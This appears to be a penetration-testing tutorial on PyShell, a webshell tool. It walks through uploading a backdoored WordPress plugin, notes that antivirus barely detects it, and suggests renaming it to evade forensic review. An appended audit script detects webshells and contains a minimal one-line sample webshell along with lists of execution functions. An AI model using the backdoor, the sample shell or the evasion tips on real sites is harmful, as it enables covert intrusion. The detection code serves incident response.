PyShell is a new tool made for bug bounty hunters, ethical hackers, penetration testers and red teamers. It helps you obtain a shell-like interface on a web server that can be accessed remotely. Unlike other webshells, the main goal of the tool is to use as little code as possible on the server side, regardless of the language used or the operating system of the server.

The default list of shells that ships with PyShell is shown below, and as you can see there is also support for WordPress!

The wordpress.zip file is a malicious WordPress plugin that places a backdoor in the WordPress installation and makes it possible for the PyShell client to communicate with it. At the time of writing the default wordpress.zip goes largely undetected by antivirus solutions. Uploading wordpress.zip to VirusTotal, which scans the file with 58 different antivirus engines, gives the following result: only one engine, Tencent, flags the backdoor.

If we look closer at the plugin there are two files. They are pretty straightforward and easy to change to make the plugin even harder to detect. For example, the plugin name is PyShell, which makes it pretty obvious to anyone doing a forensic investigation. The content of the files is as follows, PHP code:

First we start by cloning the repo from GitHub and installing the requirements. Our test is made on Kali Linux 2022.1:

git clone

If everything works we should see something like this:

The next step is to upload the wordpress.zip plugin file to our WordPress installation. To upload new plugins the user needs an account with the Administrator role (on a multisite network only the Super Admin role can install plugins), and the site must not have DISALLOW_FILE_MODS set in wp-config.php, since that removes the upload option entirely. How to get hold of such an account or access to a WordPress installation is not in scope for this guide.

So, the first step is to upload the plugin. This is done by navigating to Plugins -> Add New and pressing Upload Plugin at the top of the screen. There is no need to activate the plugin; the backdoor works anyway, because shell.php is requested directly by URL and never passes through WordPress's plugin loader. This looks good!

The URL to the backdoor can now be worked out. Since the file name is wordpress.zip the slug/subfolder will be wordpress, and since shell.php is inside wordpress.zip the backdoor URL will end with shell.php. With the default wp-content location the URL to the backdoor now looks like this: http://<target>/wp-content/plugins/wordpress/shell.php. One caveat: WordPress only names the folder after the zip file when the files sit at the root of the archive; if the archive contains a single top-level folder, that folder name becomes the slug instead.

So, let's fire up pyshell and test if it is possible to communicate with the backdoor.
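As an added example (not part of the original post and not PyShell's own code), the following Python script shows the two checks a practitioner would want at this point: predicting the directory WordPress will unpack an uploaded plugin archive into, following the rule in WP_Upgrader::install_package() (a single top-level folder wins, otherwise the zip's base name is used), and so the URL every PHP file in it will answer on, and flagging PHP files that combine an execution sink with request-controlled input, the minimal pattern of a plugin-borne webshell. The sample archive, its header file, its minimal shell.php and the host http://<target> are all constructed for this example.

```python
"""Audit a WordPress plugin archive before (or after) it lands in wp-content/plugins.

Added example, not PyShell's code. It predicts the install directory WordPress
will use, derives the URL of each PHP file in the archive, and flags PHP files
that pair a code/command-execution sink with request input.
"""
import io
import posixpath
import re
import zipfile

# Functions that execute code or commands. A hit alone is not proof of a
# webshell; paired with request input in the same file it is worth a look.
EXEC_SINKS = re.compile(
    r"\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open|"
    r"create_function|call_user_func(?:_array)?)\s*\(",
    re.IGNORECASE,
)
# Places where attacker-controlled input enters a PHP script.
INPUT_SOURCES = re.compile(
    r"\$_(?:GET|POST|REQUEST|COOKIE|FILES)\b|\$_SERVER\s*\[\s*['\"]HTTP_|"
    r"php://input|getallheaders\s*\(",
    re.IGNORECASE,
)
# A file with this header is what makes WordPress list the zip as a plugin.
PLUGIN_HEADER = re.compile(r"^\s*\*?\s*Plugin Name\s*:", re.IGNORECASE | re.MULTILINE)


def predict_install_dir(zip_filename, member_names):
    """Directory name WordPress creates under wp-content/plugins/.

    Mirrors WP_Upgrader::install_package(): if the archive holds exactly one
    top-level folder, that folder name is used; otherwise the zip's own base
    name (minus .zip) becomes the folder name.
    """
    top_level = {n.split("/", 1)[0] for n in member_names if n.strip("/")}
    dirs = {n.split("/", 1)[0] for n in member_names if "/" in n}
    if len(top_level) == 1 and top_level == dirs:
        return next(iter(top_level))
    base = posixpath.basename(zip_filename)
    return base[:-4] if base.lower().endswith(".zip") else base


def webshell_indicators(php_source):
    """Return (sinks, sources) found in one PHP file, each sorted and de-duplicated."""
    sinks = sorted({m.group(1).lower() for m in EXEC_SINKS.finditer(php_source)})
    sources = sorted({m.group(0) for m in INPUT_SOURCES.finditer(php_source)})
    return sinks, sources


def audit_plugin_zip(zip_bytes, zip_filename, site="http://<target>"):
    """Audit an uploaded plugin archive held in memory.

    Returns the predicted install directory, the URL each PHP file will answer
    on (default wp-content location assumed), whether any file carries a plugin
    header, and the files that look like webshells.
    """
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = zf.namelist()
        install_dir = predict_install_dir(zip_filename, names)
        # If the folder rule applied, strip that folder from member paths.
        top_folder = install_dir if any(n.startswith(install_dir + "/") for n in names) else None
        report = {"install_dir": install_dir, "has_plugin_header": False,
                  "php_urls": {}, "suspicious": {}}
        for name in names:
            if not name.lower().endswith(".php"):
                continue
            source = zf.read(name).decode("utf-8", errors="replace")
            rel = name[len(top_folder) + 1:] if top_folder else name
            report["php_urls"][name] = f"{site}/wp-content/plugins/{install_dir}/{rel}"
            if PLUGIN_HEADER.search(source):
                report["has_plugin_header"] = True
            sinks, sources = webshell_indicators(source)
            if sinks and sources:
                report["suspicious"][name] = {"sinks": sinks, "sources": sources}
        return report


# Constructed sample archive: two files at the zip root, like the plugin
# discussed above. shell.php is a generic minimal webshell written for this
# example; it is not PyShell's shell.php.
SAMPLE_HEADER_PHP = b"""<?php
/*
Plugin Name: PyShell
Description: placeholder header so WordPress lists the plugin
*/
"""
SAMPLE_SHELL_PHP = b"""<?php
if (isset($_POST['c'])) { echo shell_exec($_POST['c']); }
"""


def build_sample_zip(top_folder=None):
    """Build wordpress.zip in memory; optionally nest the files in a folder."""
    prefix = f"{top_folder}/" if top_folder else ""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(prefix + "pyshell.php", SAMPLE_HEADER_PHP)
        zf.writestr(prefix + "shell.php", SAMPLE_SHELL_PHP)
    return buf.getvalue()


if __name__ == "__main__":
    import json
    print(json.dumps(audit_plugin_zip(build_sample_zip(), "wordpress.zip"), indent=2))
```

Run against a real upload by reading the zip bytes from disk instead of calling build_sample_zip(); the same audit works after the fact on a directory copied out of wp-content/plugins by zipping it first. The sink/source pairing is deliberately coarse: it is a triage filter for incident responders, not a verdict, and a shell that hides its primitives behind string concatenation or obfuscation will need manual review.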